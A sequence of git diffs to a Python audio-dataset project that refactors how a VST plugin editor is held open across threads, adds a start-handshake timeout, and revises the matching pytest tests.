-            logger.exception("vst-editor-window crashed: {}", exc)
+            result.append(body())
+        except BaseException as exc:  # noqa: BLE001 — propagate to caller after show_editor returns
             captured.append(exc)
+        finally:
+            close_editor.set()
 
-    editor_thread = threading.Thread(target=_run_editor, daemon=True, name="vst-editor-window")
-    editor_thread.start()
+    worker = threading.Thread(target=_worker, name="render-worker")
+    worker.start()
     try:
-        if not editor_started.wait(timeout=_EDITOR_START_TIMEOUT_SECONDS):
-            raise EditorStartTimeout(
-                f"vst-editor-window did not signal start within {_EDITOR_START_TIMEOUT_SECONDS}s"
-            )
-        yield
+        plugin.show_editor(close_editor)
     finally:
         close_editor.set()
-        editor_thread.join(timeout=_EDITOR_JOIN_TIMEOUT_SECONDS)
-        if editor_thread.is_alive():
+        worker.join(timeout=_EDITOR_JOIN_TIMEOUT_SECONDS)
+        if worker.is_alive():
             logger.warning(
-                "vst-editor-window did not drain within {}s; daemon thread "
-                "leaks (reaped at process exit)",
+                "render-worker did not drain within {}s; thread leaks (reaped at process exit)",
                 _EDITOR_JOIN_TIMEOUT_SECONDS,
             )
-        # sys.exc_info() returns the body's exception if `with` body raised,
-        # else (None, None, None). Only surface the captured editor-thread
-        # exception when the body succeeded — re-raising during an active
-        # body exception would mask the original error (raise-in-finally wins).
-        body_exc_active = sys.exc_info()[0] is not None
-        if captured and not body_exc_active:
-            exc: Exception = captured[0]
-            raise exc
-        if captured and body_exc_active:
-            logger.error(
-                "vst-editor-window also crashed during body exception: {}",
-                captured[0],
-            )
+    if captured:
+        exc: BaseException = captured[0]
+        raise exc
+    if not result:
+        # Worker outlived the join window without completing — the leak warning above
+        # records this; there's no body return value to surface.
+        return None  # type: ignore[return-value]
+    return result[0]
 
 
 def load_preset(plugin: VST3Plugin, preset_path: str) -> None:

--- a/src/synth_setter/data/vst/core.py
+++ b/src/synth_setter/data/vst/core.py
@@ -18,6 +18,10 @@ _EDITOR_INIT_DELAY_SECONDS = 0.5
 # drain after the close event is set; a generous safety net for the held-open
 # path (#1187), not a normal-case timing parameter.
 _EDITOR_JOIN_TIMEOUT_SECONDS = 2.0
+# Upper bound on how long ``editor_held_open`` waits for the editor thread to
+# signal it has been scheduled past the entry point before yielding to the
+# body (#1198); a slow-start miss warns and proceeds rather than raises.
+_EDITOR_START_TIMEOUT_SECONDS = 5.0
 
 
 def extract_renderer_version(plugin_path: Path) -> str:
@@ -105,15 +109,23 @@ def editor_held_open(plugin: VST3Plugin) -> Iterator[None]:
     the ``finally``-clause raise). If the join times out the daemon thread is
     left to be reaped at process exit; a warning records the leak.
 
+    Before yielding, blocks on a start handshake bounded by
+    ``_EDITOR_START_TIMEOUT_SECONDS`` (#1198). The event only proves the
+    editor thread was scheduled past the entry point, not that
+    ``show_editor`` has realised the window — pedalboard exposes no
+    editor-ready signal.
+
     :param plugin: A loaded VST3 plugin whose editor is realised for the block.
     :raises Exception: Propagated from the editor thread at ``__exit__`` only
         when the ``with`` body itself raised nothing — typically a
         ``RuntimeError`` from the VST3 host.
     """
     close_editor = threading.Event()
+    editor_started = threading.Event()
     captured: list[Exception] = []
 
     def _run_editor() -> None:
+        editor_started.set()
         try:
             plugin.show_editor(close_editor)
         except Exception as exc:  # noqa: BLE001 — fan-in for any host-side failure
@@ -122,6 +134,12 @@ def editor_held_open(plugin: VST3Plugin) -> Iterator[None]:
 
     editor_thread = threading.Thread(target=_run_editor, daemon=True, name="vst-editor-window")
     editor_thread.start()
+    if not editor_started.wait(timeout=_EDITOR_START_TIMEOUT_SECONDS):
+        logger.warning(
+            "vst-editor-window did not signal start within {}s; "
+            "proceeding without start handshake",
+            _EDITOR_START_TIMEOUT_SECONDS,
+        )
     try:
         yield
     finally:

--- a/src/synth_setter/data/vst/writers.py
+++ b/src/synth_setter/data/vst/writers.py
@@ -8,7 +8,6 @@ writer using ``webdataset.TarWriter``.
 
 from __future__ import annotations
 
-import contextlib
 from collections.abc import Callable
 from pathlib import Path
 from types import TracebackType
@@ -22,7 +21,7 @@ from pedalboard import VST3Plugin
 from tqdm import trange
 
 from synth_setter.data.vst import param_specs
-from synth_setter.data.vst.core import editor_held_open, load_plugin, load_preset
+from synth_setter.data.vst.core import load_plugin, load_preset, run_with_editor_held_open
 from synth_setter.data.vst.generate_vst_dataset import (
     VSTDataSample,
     create_datasets_and_get_start_idx,
@@ -257,30 +256,17 @@ def _render_in_batches(
         renderer without ``plugin_reload_cadence="once"`` (validator regression).
     """
     num_samples = render_cfg.samples_per_shard
-    sample_batch: list[VSTDataSample] = []
-    sample_batch_start = start_idx
     # plugin_reload_cadence="once": load + preset once per shard, reuse instance (#705).
     # "render" (default): cached_plugin stays None; each render reloads (#489 historical).
     cached_plugin: VST3Plugin | None = None
     if render_cfg.plugin_reload_cadence == "once":
         cached_plugin = load_plugin(render_cfg.plugin_path)
         load_preset(cached_plugin, render_cfg.preset_path)
-    # always_on holds the editor open on a background thread for the whole
-    # shard; RenderConfig validator pairs it with plugin_reload_cadence="once"
-    # so cached_plugin is non-None here (#1187).
-    gui_scope: contextlib.AbstractContextManager[None]
-    if render_cfg.gui_toggle_cadence == "always_on":
-        if cached_plugin is None:
-            raise RuntimeError(
-                "always_on reached the renderer without a cached plugin; "
-                "RenderConfig._always_on_requires_plugin_reload_once validator "
-                "should have rejected this combination."
-            )
-        gui_scope = editor_held_open(cached_plugin)
-    else:
-        gui_scope = contextlib.nullcontext()
-    warmup_done = False
-    with gui_scope:
+
+    def _render_loop() -> None:
+        sample_batch: list[VSTDataSample] = []
+        sample_batch_start = start_idx
+        warmup_done = False
         for i in trange(start_idx, num_samples):
             logger.info(f"Making sample {i}")
             warmup_this_render = render_cfg.gui_toggle_cadence == "render" or (
@@ -313,6 +299,21 @@ def _render_in_batches(
 
         if sample_batch:
             flush_batch(sample_batch, sample_batch_start)
+
+    # always_on: main thread blocks in ``show_editor`` while ``_render_loop`` runs
+    # on a worker (pedalboard requires show_editor on the main thread, #1204).
+    # RenderConfig validator pairs always_on with plugin_reload_cadence="once"
+    # so cached_plugin is non-None on this branch (#1187).
+    if render_cfg.gui_toggle_cadence == "always_on":
+        if cached_plugin is None:
+            raise RuntimeError(
+                "always_on reached the renderer without a cached plugin; "
+                "RenderConfig._always_on_requires_plugin_reload_once validator "
+                "should have rejected this combination."
+            )
+        run_with_editor_held_open(cached_plugin, _render_loop)
+    else:
+        _render_loop()
 
 
 def _shard_metadata_from_render(render_cfg: RenderConfig) -> ShardMetadata:

--- a/tests/data/vst/test_always_on_integration.py
+++ b/tests/data/vst/test_always_on_integration.py
@@ -2,10 +2,11 @@
 
 Runs through ``docker/ubuntu22_04/run-linux-vst-headless.sh`` (Xvfb + xsettingsd
 + openbox + dbus) inside the existing ``test-vst-slow.yml`` workflow. Verifies
-that ``editor_held_open`` survives off the main thread on X11, the shard loop
-completes for all samples with the editor realised throughout, the produced
-HDF5 carries the expected datasets/shapes/dtypes/finiteness, and the editor
-thread emits no crash log via ``core.logger.exception``.
+that ``run_with_editor_held_open`` keeps the editor realised on the main
+thread while renders run on a worker, the shard loop completes for all
+samples, the produced HDF5 carries the expected datasets/shapes/dtypes/
+finiteness, and no render-worker crash log is emitted via
+``core.logger.exception``.
 
 The matching macOS Cocoa coverage is tracked separately — Apple runners with
 Surge XT installed are not part of any current workflow; see the follow-up
@@ -88,13 +89,13 @@ def test_always_on_renders_small_shard_end_to_end(
     Renders 4 samples in 2 batches so the per-batch flush callback fires inside
     the held-open scope twice. Asserts the HDF5 shard carries all three datasets
     at the expected shape/dtype, that audio is finite and within ``[-1, 1]``,
-    and that ``core.logger.exception`` was never called from the editor thread
-    (the structural crash gate — caplog cannot observe loguru output, so the
-    logger is stubbed to make the check observable).
+    and that ``core.logger.exception`` was never called (the structural crash
+    gate — caplog cannot observe loguru output, so the logger is stubbed to
+    make the check observable).
 
     :param tmp_path: Destination directory for the shard HDF5 file under test.
-    :param monkeypatch: Stubs ``core.logger`` so the editor-thread crash gate
-        is observable (loguru does not propagate to ``caplog``).
+    :param monkeypatch: Stubs ``core.logger`` so the crash gate is observable
+        (loguru does not propagate to ``caplog``).
     """
     num_samples = 4
     render_cfg = _render_cfg(num_samples=num_samples, samples_per_render_batch=2)
@@ -122,9 +123,6 @@ def test_always_on_renders_small_shard_end_to_end(
     assert np.isfinite(audio).all(), "rendered audio contains NaN/Inf"
     assert (np.abs(audio) <= 1.0).all(), "rendered audio exceeds [-1, 1] bounds"
 
-    crash_log_calls = [
-        call
-        for call in fake_logger.exception.call_args_list
-        if "vst-editor-window crashed" in str(call.args[0])
-    ]
-    assert not crash_log_calls, f"editor-thread crash logged: {crash_log_calls}"
+    assert fake_logger.exception.call_count == 0, (
+        f"unexpected logger.exception calls: {fake_logger.exception.call_args_list}"
+    )

--- a/tests/data/vst/test_core.py
+++ b/tests/data/vst/test_core.py
@@ -164,6 +164,110 @@ class TestEditorHeldOpen:
             for call in fake_logger.error.call_args_list
         )
 
+    def test_waits_for_editor_thread_start_before_yield(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """``editor_started`` is set before the ``with`` body runs — see #1198.
+
+        Without the handshake the body can begin before the editor thread
+        enters ``show_editor``. We delay the thread's start so a body that
+        ran immediately would observe ``inside_show_editor`` unset; the
+        handshake forces the wait, so the assertion sees it set.
+
+        :param monkeypatch: Wraps ``threading.Thread`` to delay ``start`` and
+            expose the race the handshake closes.
+        """
+        fake_plugin = MagicMock()
+        inside_show_editor = threading.Event()
+
+        def block_inside_show_editor(event: threading.Event) -> None:
+            inside_show_editor.set()
+            event.wait(timeout=5.0)
+
+        fake_plugin.show_editor.side_effect = block_inside_show_editor
+
+        real_thread_cls = threading.Thread
+
+        def make_delayed_thread(*args: object, **kwargs: object) -> threading.Thread:
+            t = real_thread_cls(*args, **kwargs)  # type: ignore[arg-type]
+            original_start = t.start
+
+            def delayed_start() -> None:
+                def deferred() -> None:
+                    time.sleep(0.05)
+                    original_start()
+
+                real_thread_cls(target=deferred, daemon=True).start()
+
+            t.start = delayed_start  # type: ignore[method-assign]
+            return t
+
+        monkeypatch.setattr(threading, "Thread", make_delayed_thread)
+
+        with core.editor_held_open(fake_plugin):
+            assert inside_show_editor.is_set()
+
+    def test_slow_start_warns_and_proceeds(self, monkeypatch: pytest.MonkeyPatch) -> None:
+        """Editor thread that misses the start handshake logs a warning and the body still runs.
+
+        Simulates a thread that delays starting past
+        ``_EDITOR_START_TIMEOUT_SECONDS``. The context manager must not raise;
+        it warns and proceeds so the render still happens — best-effort
+        handshake (see #1198).
+
+        :param monkeypatch: Tightens ``_EDITOR_START_TIMEOUT_SECONDS`` and stubs
+            ``core.logger`` so the slow-start warning assertion is observable.
+        """
+        monkeypatch.setattr(core, "_EDITOR_START_TIMEOUT_SECONDS", 0.05)
+        fake_logger = MagicMock()
+        monkeypatch.setattr(core, "logger", fake_logger)
+
+        fake_plugin = MagicMock()
+        show_editor_entered = threading.Event()
+
+        def show_editor_blocks(event: threading.Event) -> None:
+            show_editor_entered.set()
+            event.wait(timeout=5.0)
+
+        fake_plugin.show_editor.side_effect = show_editor_blocks
+
+        real_thread_cls = threading.Thread
+        release_real_start = threading.Event()
+
+        def make_slow_thread(*args: object, **kwargs: object) -> threading.Thread:
+            t = real_thread_cls(*args, **kwargs)  # type: ignore[arg-type]
+            original_start = t.start
+
+            def slow_start() -> None:
+                # Defer real start until the handshake timeout has been
+                # observed; an order of magnitude under any join timeout.
+                def deferred() -> None:
+                    release_real_start.wait(timeout=1.0)
+                    original_start()
+
+                real_thread_cls(target=deferred, daemon=True).start()
+
+            t.start = slow_start  # type: ignore[method-assign]
+            return t
+
+        monkeypatch.setattr(threading, "Thread", make_slow_thread)
+
+        body_ran = False
+        with core.editor_held_open(fake_plugin):
+            body_ran = True
+            # Let the deferred real start fire and the editor thread reach
+            # ``show_editor`` so the finally-clause join sees a started
+            # thread; production threads start synchronously — the delay is
+            # a test-only artifact of the slow-start stub.
+            release_real_start.set()
+            assert show_editor_entered.wait(timeout=1.0)
+
+        assert body_ran
+        assert any(
+            "did not signal start" in str(call.args[0])
+            for call in fake_logger.warning.call_args_list
+        )
+
     def test_join_timeout_does_not_deadlock(self, monkeypatch: pytest.MonkeyPatch) -> None:
         """If ``show_editor`` ignores the close event, ``__exit__`` returns within the timeout.
 

--- a/tests/data/vst/test_core.py
+++ b/tests/data/vst/test_core.py
@@ -167,45 +167,54 @@ class TestEditorHeldOpen:
     def test_waits_for_editor_thread_start_before_yield(
         self, monkeypatch: pytest.MonkeyPatch
     ) -> None:
-        """``editor_started`` is set before the ``with`` body runs — see #1198.
+        """``with`` body entry is gated on the start handshake — see #1198.
 
-        Without the handshake the body can begin before the editor thread
-        enters ``show_editor``. We delay the thread's start so a body that
-        ran immediately would observe ``inside_show_editor`` unset; the
-        handshake forces the wait, so the assertion sees it set.
+        The fake editor thread blocks behind ``release_start`` before
+        running ``_run_editor``, so without the handshake the body would
+        enter while ``editor_started`` is still unset. The body's entry
+        timestamp must therefore land after ``release_start`` was set,
+        which is the only signal that unblocks ``editor_started.wait``.
 
-        :param monkeypatch: Wraps ``threading.Thread`` to delay ``start`` and
-            expose the race the handshake closes.
+        :param monkeypatch: Wraps ``threading.Thread`` so the editor
+            thread's target blocks on a gate; isolates the timing
+            contract from scheduler luck.
         """
         fake_plugin = MagicMock()
-        inside_show_editor = threading.Event()
+        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
 
-        def block_inside_show_editor(event: threading.Event) -> None:
-            inside_show_editor.set()
-            event.wait(timeout=5.0)
-
-        fake_plugin.show_editor.side_effect = block_inside_show_editor
-
+        release_start = threading.Event()
         real_thread_cls = threading.Thread
 
-        def make_delayed_thread(*args: object, **kwargs: object) -> threading.Thread:
-            t = real_thread_cls(*args, **kwargs)  # type: ignore[arg-type]
-            original_start = t.start
+        def make_gated_thread(*args: object, **kwargs: object) -> threading.Thread:
+            user_target = kwargs.pop("target", None)
 
-            def delayed_start() -> None:
-                def deferred() -> None:
-                    time.sleep(0.05)
-                    original_start()
+            def gated_target() -> None:
+                release_start.wait(timeout=5.0)
+                if callable(user_target):
+                    user_target()
 
-                real_thread_cls(target=deferred, daemon=True).start()
+            return real_thread_cls(*args, target=gated_target, **kwargs)  # type: ignore[arg-type]
 
-            t.start = delayed_start  # type: ignore[method-assign]
-            return t
+        monkeypatch.setattr(threading, "Thread", make_gated_thread)
 
-        monkeypatch.setattr(threading, "Thread", make_delayed_thread)
+        release_at: list[float] = []
+
+        def release_after_delay() -> None:
+            time.sleep(0.1)
+            release_at.append(time.monotonic())
+            release_start.set()
+
+        releaser = real_thread_cls(target=release_after_delay, daemon=True)
+        releaser.start()
 
         with core.editor_held_open(fake_plugin):
-            assert inside_show_editor.is_set()
+            t_body_entered = time.monotonic()
+
+        releaser.join(timeout=1.0)
+        assert release_at, "releaser did not run"
+        assert t_body_entered >= release_at[0], (
+            "with-body entered before the start handshake fired"
+        )
 
     def test_slow_start_warns_and_proceeds(self, monkeypatch: pytest.MonkeyPatch) -> None:
         """Editor thread that misses the start handshake logs a warning and the body still runs.

--- a/tests/data/vst/test_core.py
+++ b/tests/data/vst/test_core.py
@@ -287,24 +287,28 @@ class TestEditorHeldOpen:
         fake_plugin = MagicMock()
         fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
 
-        real_thread_cls = threading.Thread
-        release_real_start = threading.Event()
+        # Defer ``editor_started.set()`` by 0.2s — the second ``Event`` created
+        # by ``editor_held_open`` (``close_editor`` is first) — so the handshake
+        # misses its 0.05s deadline while the real thread still starts and
+        # ``show_editor`` honours ``close_editor``, letting the finally-clause
+        # teardown join a real started daemon under ``_EDITOR_JOIN_TIMEOUT_SECONDS``
+        # (#1204).
+        events_created: list[threading.Event] = []
+        original_event_init = threading.Event.__init__
 
-        def make_slow_thread(*args: object, **kwargs: object) -> threading.Thread:
-            t = real_thread_cls(*args, **kwargs)  # type: ignore[arg-type]
-            original_start = t.start
+        def init_capture(self: threading.Event) -> None:
+            original_event_init(self)
+            events_created.append(self)
+            if len(events_created) == 2:
+                original_set = self.set
 
-            def slow_start() -> None:
-                def deferred() -> None:
-                    release_real_start.wait(timeout=1.0)
-                    original_start()
+                def deferred_set() -> None:
+                    time.sleep(0.2)
+                    original_set()
 
-                real_thread_cls(target=deferred, daemon=True).start()
+                self.set = deferred_set  # type: ignore[method-assign]
 
-            t.start = slow_start  # type: ignore[method-assign]
-            return t
-
-        monkeypatch.setattr(threading, "Thread", make_slow_thread)
+        monkeypatch.setattr(threading.Event, "__init__", init_capture)
 
         body_ran = False
         with pytest.raises(core.EditorStartTimeout, match="did not signal start"):
@@ -312,7 +316,66 @@ class TestEditorHeldOpen:
                 body_ran = True
 
         assert not body_ran, "body must not run when start handshake misses"
-        release_real_start.set()  # let the deferred real start drain
+
+    def test_slow_start_joins_editor_thread_before_raising(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """Timeout path runs the same teardown (close + join + leak warn) as the success path.
+
+        Without the shared finalization the editor thread can start late and
+        call ``show_editor`` after the context manager has already raised,
+        leaking work past the failed context-entry. Captures the real
+        ``threading.Thread`` instance handed to ``editor_held_open`` and
+        asserts ``is_alive()`` is ``False`` once ``EditorStartTimeout``
+        propagates — proving the timeout path joined the daemon under the
+        same bounded teardown as the success path (#1204).
+
+        :param monkeypatch: Tightens ``_EDITOR_START_TIMEOUT_SECONDS``, defers
+            the ``editor_started.set()`` call past the handshake deadline,
+            and captures the real thread instance so ``is_alive()`` is
+            observable post-raise.
+        """
+        monkeypatch.setattr(core, "_EDITOR_START_TIMEOUT_SECONDS", 0.05)
+
+        fake_plugin = MagicMock()
+        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
+
+        events_created: list[threading.Event] = []
+        original_event_init = threading.Event.__init__
+
+        def init_capture(self: threading.Event) -> None:
+            original_event_init(self)
+            events_created.append(self)
+            if len(events_created) == 2:
+                original_set = self.set
+
+                def deferred_set() -> None:
+                    time.sleep(0.2)
+                    original_set()
+
+                self.set = deferred_set  # type: ignore[method-assign]
+
+        monkeypatch.setattr(threading.Event, "__init__", init_capture)
+
+        real_thread_cls = threading.Thread
+        captured_threads: list[threading.Thread] = []
+
+        def capture_thread(*args: object, **kwargs: object) -> threading.Thread:
+            t = real_thread_cls(*args, **kwargs)  # type: ignore[arg-type]
+            captured_threads.append(t)
+            return t
+
+        monkeypatch.setattr(threading, "Thread", capture_thread)
+
+        with pytest.raises(core.EditorStartTimeout):
+            with core.editor_held_open(fake_plugin):
+                pass
+
+        assert captured_threads, "editor thread was not captured"
+        editor_thread = captured_threads[0]
+        assert not editor_thread.is_alive(), (
+            "editor thread leaked past EditorStartTimeout — join missing on timeout path"
+        )
 
     def test_join_timeout_does_not_deadlock(self, monkeypatch: pytest.MonkeyPatch) -> None:
         """If ``show_editor`` ignores the close event, ``__exit__`` returns within the timeout.

--- a/tests/data/vst/test_core.py
+++ b/tests/data/vst/test_core.py
@@ -92,13 +92,35 @@ class TestWarmupPlugin:
         fake_plugin.show_editor.assert_called_once()
 
 
-class TestEditorHeldOpen:
-    """``editor_held_open`` opens the plugin editor on a background thread for the ``with``
-    body."""
+class TestRunWithEditorHeldOpen:
+    """``run_with_editor_held_open`` runs ``body()`` on a worker while the caller blocks in
+    ``show_editor``."""
 
-    def test_opens_once_and_closes_on_exit(self) -> None:
-        """``show_editor`` is called once on a background thread; close_event set on
-        ``__exit__``."""
+    def test_body_runs_on_worker_thread_and_returns_value(self) -> None:
+        """``body()`` runs off the caller thread; its return value propagates.
+
+        Captures the thread identity inside ``body`` and asserts it differs
+        from the calling thread — pedalboard requires ``show_editor`` on the
+        caller (main) thread, so the render work MUST execute elsewhere.
+        """
+        fake_plugin = MagicMock()
+        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
+
+        caller_ident = threading.get_ident()
+        body_ident: list[int] = []
+
+        def body() -> str:
+            body_ident.append(threading.get_ident())
+            return "done"
+
+        result = core.run_with_editor_held_open(fake_plugin, body)
+
+        assert result == "done"
+        assert body_ident and body_ident[0] != caller_ident
+        fake_plugin.show_editor.assert_called_once()
+
+    def test_close_event_is_set_after_body_returns(self) -> None:
+        """The event passed to ``show_editor`` is set so the main thread unblocks."""
         fake_plugin = MagicMock()
         captured_event: list[threading.Event] = []
 
@@ -108,277 +130,41 @@ class TestEditorHeldOpen:
 
         fake_plugin.show_editor.side_effect = record_event
 
-        with core.editor_held_open(fake_plugin):
-            pass
+        core.run_with_editor_held_open(fake_plugin, lambda: None)
 
-        fake_plugin.show_editor.assert_called_once()
         assert len(captured_event) == 1
         assert captured_event[0].is_set()
 
-    def test_logs_and_reraises_thread_exception(self, monkeypatch: pytest.MonkeyPatch) -> None:
-        """An exception in ``show_editor`` is logged immediately and re-raised at ``__exit__``.
+    def test_body_exception_propagates_after_show_editor_returns(self) -> None:
+        """An exception raised inside ``body`` propagates to the caller."""
+        fake_plugin = MagicMock()
+        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
 
-        :param monkeypatch: Stubs ``core.logger`` so the log call can be observed
-            (loguru does not propagate to ``caplog``'s stdlib handler).
-        """
+        def body() -> None:
+            raise ValueError("render failed")
+
+        with pytest.raises(ValueError, match="render failed"):
+            core.run_with_editor_held_open(fake_plugin, body)
+
+        fake_plugin.show_editor.assert_called_once()
+
+    def test_show_editor_exception_propagates_through_finally(self) -> None:
+        """A ``show_editor`` failure on the caller thread surfaces; the worker is joined."""
         fake_plugin = MagicMock()
         fake_plugin.show_editor.side_effect = RuntimeError("xserver gone")
-        fake_logger = MagicMock()
-        monkeypatch.setattr(core, "logger", fake_logger)
+
+        worker_ran = threading.Event()
+
+        def body() -> None:
+            worker_ran.set()
 
         with pytest.raises(RuntimeError, match="xserver gone"):
-            with core.editor_held_open(fake_plugin):
-                time.sleep(0.05)  # let the editor thread run + raise
+            core.run_with_editor_held_open(fake_plugin, body)
 
-        assert fake_logger.exception.call_count == 1
-        assert "vst-editor-window crashed" in fake_logger.exception.call_args.args[0]
-
-    def test_body_exception_wins_over_editor_exception(
-        self, monkeypatch: pytest.MonkeyPatch
-    ) -> None:
-        """If both the ``with`` body and the editor thread raise, the body's exception propagates.
-
-        Re-raising the captured editor exception inside the ``finally`` clause
-        would otherwise mask the body exception (raise-in-finally wins). The
-        editor crash still gets a structured error log so it is not lost.
-
-        :param monkeypatch: Stubs ``core.logger`` so the editor crash log can
-            be observed.
-        :raises ValueError: Intentionally raised inside the ``with`` body to
-            exercise the body-wins precedence path under test.
-        """
-        fake_plugin = MagicMock()
-        fake_plugin.show_editor.side_effect = RuntimeError("editor crashed")
-        fake_logger = MagicMock()
-        monkeypatch.setattr(core, "logger", fake_logger)
-
-        with pytest.raises(ValueError, match="body crashed"):
-            with core.editor_held_open(fake_plugin):
-                time.sleep(0.05)  # let the editor thread run + raise
-                raise ValueError("body crashed")
-
-        # editor crash still surfaces via the structured error log so it is
-        # not lost when the body exception takes precedence.
-        assert any(
-            "also crashed during body exception" in str(call.args[0])
-            for call in fake_logger.error.call_args_list
-        )
-
-    def test_waits_for_editor_thread_start_before_yield(
-        self, monkeypatch: pytest.MonkeyPatch
-    ) -> None:
-        """``with`` body entry is gated on the start handshake — see #1198.
-
-        The fake editor thread blocks behind ``release_start`` before
-        running ``_run_editor``, so without the handshake the body would
-        enter while ``editor_started`` is still unset. The body's entry
-        timestamp must therefore land after ``release_start`` was set,
-        which is the only signal that unblocks ``editor_started.wait``.
-
-        :param monkeypatch: Wraps ``threading.Thread`` so the editor
-            thread's target blocks on a gate; isolates the timing
-            contract from scheduler luck.
-        """
-        fake_plugin = MagicMock()
-        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
-
-        release_start = threading.Event()
-        real_thread_cls = threading.Thread
-
-        def make_gated_thread(*args: object, **kwargs: object) -> threading.Thread:
-            user_target = kwargs.pop("target", None)
-
-            def gated_target() -> None:
-                release_start.wait(timeout=5.0)
-                if callable(user_target):
-                    user_target()
-
-            return real_thread_cls(*args, target=gated_target, **kwargs)  # type: ignore[arg-type]
-
-        monkeypatch.setattr(threading, "Thread", make_gated_thread)
-
-        release_at: list[float] = []
-
-        def release_after_delay() -> None:
-            time.sleep(0.1)
-            release_at.append(time.monotonic())
-            release_start.set()
-
-        releaser = real_thread_cls(target=release_after_delay, daemon=True)
-        releaser.start()
-
-        with core.editor_held_open(fake_plugin):
-            t_body_entered = time.monotonic()
-
-        releaser.join(timeout=1.0)
-        assert release_at, "releaser did not run"
-        assert t_body_entered >= release_at[0], (
-            "with-body entered before the start handshake fired"
-        )
-
-    def test_without_handshake_body_enters_before_editor_thread_starts(
-        self, monkeypatch: pytest.MonkeyPatch
-    ) -> None:
-        """Inverse of the positive test: with the handshake disabled, the body wins the race.
-
-        Pins the negative side of #1198. Stubs the handshake wait so it
-        returns ``True`` without firing the raise-on-miss path (#1204) — the
-        body must then enter before the gated editor thread fires, proving
-        the positive test would fail if the handshake were removed.
-
-        :param monkeypatch: Wraps ``threading.Event.__init__`` so the second
-            event created (the handshake event in ``editor_held_open``) has
-            its ``wait`` short-circuited; wraps ``threading.Thread`` so the
-            editor thread blocks on a gate.
-        """
-        fake_plugin = MagicMock()
-        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
-
-        release_start = threading.Event()
-        real_thread_cls = threading.Thread
-
-        def make_gated_thread(*args: object, **kwargs: object) -> threading.Thread:
-            user_target = kwargs.pop("target", None)
-
-            def gated_target() -> None:
-                release_start.wait(timeout=5.0)
-                if callable(user_target):
-                    user_target()
-
-            return real_thread_cls(*args, target=gated_target, **kwargs)  # type: ignore[arg-type]
-
-        monkeypatch.setattr(threading, "Thread", make_gated_thread)
-
-        # Short-circuit the handshake by patching ``wait`` on the second
-        # Event created in ``editor_held_open`` (``close_editor`` is first,
-        # ``editor_started`` is second). Targeting the instance keeps the
-        # close_editor / release_start waits running real code.
-        events_created: list[threading.Event] = []
-        original_init = threading.Event.__init__
-
-        def tracking_init(self: threading.Event, *args: object, **kwargs: object) -> None:
-            original_init(self, *args, **kwargs)  # type: ignore[arg-type]
-            events_created.append(self)
-            if len(events_created) == 2:
-                self.wait = lambda timeout=None: True  # type: ignore[method-assign,assignment]
-
-        monkeypatch.setattr(threading.Event, "__init__", tracking_init)
-
-        with core.editor_held_open(fake_plugin):
-            # Body entered with the editor thread still gated — the handshake
-            # (not scheduler luck) is what makes the positive test pass.
-            assert not release_start.is_set()
-            release_start.set()
-
-    def test_slow_start_raises_editor_start_timeout(self, monkeypatch: pytest.MonkeyPatch) -> None:
-        """Editor thread that misses the start handshake raises ``EditorStartTimeout``.
-
-        Simulates a thread that delays starting past
-        ``_EDITOR_START_TIMEOUT_SECONDS``. The context manager must raise
-        before yielding so the body never runs — a slow editor bring-up is a
-        loud, traceable failure rather than a warning lost in noise (#1204).
-
-        :param monkeypatch: Tightens ``_EDITOR_START_TIMEOUT_SECONDS`` and
-            wraps ``threading.Thread`` so the editor thread's real start is
-            deferred past the handshake deadline.
-        """
-        monkeypatch.setattr(core, "_EDITOR_START_TIMEOUT_SECONDS", 0.05)
-
-        fake_plugin = MagicMock()
-        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
-
-        # Defer ``editor_started.set()`` by 0.2s — the second ``Event`` created
-        # by ``editor_held_open`` (``close_editor`` is first) — so the handshake
-        # misses its 0.05s deadline while the real thread still starts and
-        # ``show_editor`` honours ``close_editor``, letting the finally-clause
-        # teardown join a real started daemon under ``_EDITOR_JOIN_TIMEOUT_SECONDS``
-        # (#1204).
-        events_created: list[threading.Event] = []
-        original_event_init = threading.Event.__init__
-
-        def init_capture(self: threading.Event) -> None:
-            original_event_init(self)
-            events_created.append(self)
-            if len(events_created) == 2:
-                original_set = self.set
-
-                def deferred_set() -> None:
-                    time.sleep(0.2)
-                    original_set()
-
-                self.set = deferred_set  # type: ignore[method-assign]
-
-        monkeypatch.setattr(threading.Event, "__init__", init_capture)
-
-        body_ran = False
-        with pytest.raises(core.EditorStartTimeout, match="did not signal start"):
-            with core.editor_held_open(fake_plugin):
-                body_ran = True
-
-        assert not body_ran, "body must not run when start handshake misses"
-
-    def test_slow_start_joins_editor_thread_before_raising(
-        self, monkeypatch: pytest.MonkeyPatch
-    ) -> None:
-        """Timeout path runs the same teardown (close + join + leak warn) as the success path.
-
-        Without the shared finalization the editor thread can start late and
-        call ``show_editor`` after the context manager has already raised,
-        leaking work past the failed context-entry. Captures the real
-        ``threading.Thread`` instance handed to ``editor_held_open`` and
-        asserts ``is_alive()`` is ``False`` once ``EditorStartTimeout``
-        propagates — proving the timeout path joined the daemon under the
-        same bounded teardown as the success path (#1204).
-
-        :param monkeypatch: Tightens ``_EDITOR_START_TIMEOUT_SECONDS``, defers
-            the ``editor_started.set()`` call past the handshake deadline,
-            and captures the real thread instance so ``is_alive()`` is
-            observable post-raise.
-        """
-        monkeypatch.setattr(core, "_EDITOR_START_TIMEOUT_SECONDS", 0.05)
-
-        fake_plugin = MagicMock()
-        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
-
-        events_created: list[threading.Event] = []
-        original_event_init = threading.Event.__init__
-
-        def init_capture(self: threading.Event) -> None:
-            original_event_init(self)
-            events_created.append(self)
-            if len(events_created) == 2:
-                original_set = self.set
-
-                def deferred_set() -> None:
-                    time.sleep(0.2)
-                    original_set()
-
-                self.set = deferred_set  # type: ignore[method-assign]
-
-        monkeypatch.setattr(threading.Event, "__init__", init_capture)
-
-        real_thread_cls = threading.Thread
-        captured_threads: list[threading.Thread] = []
-
-        def capture_thread(*args: object, **kwargs: object) -> threading.Thread:
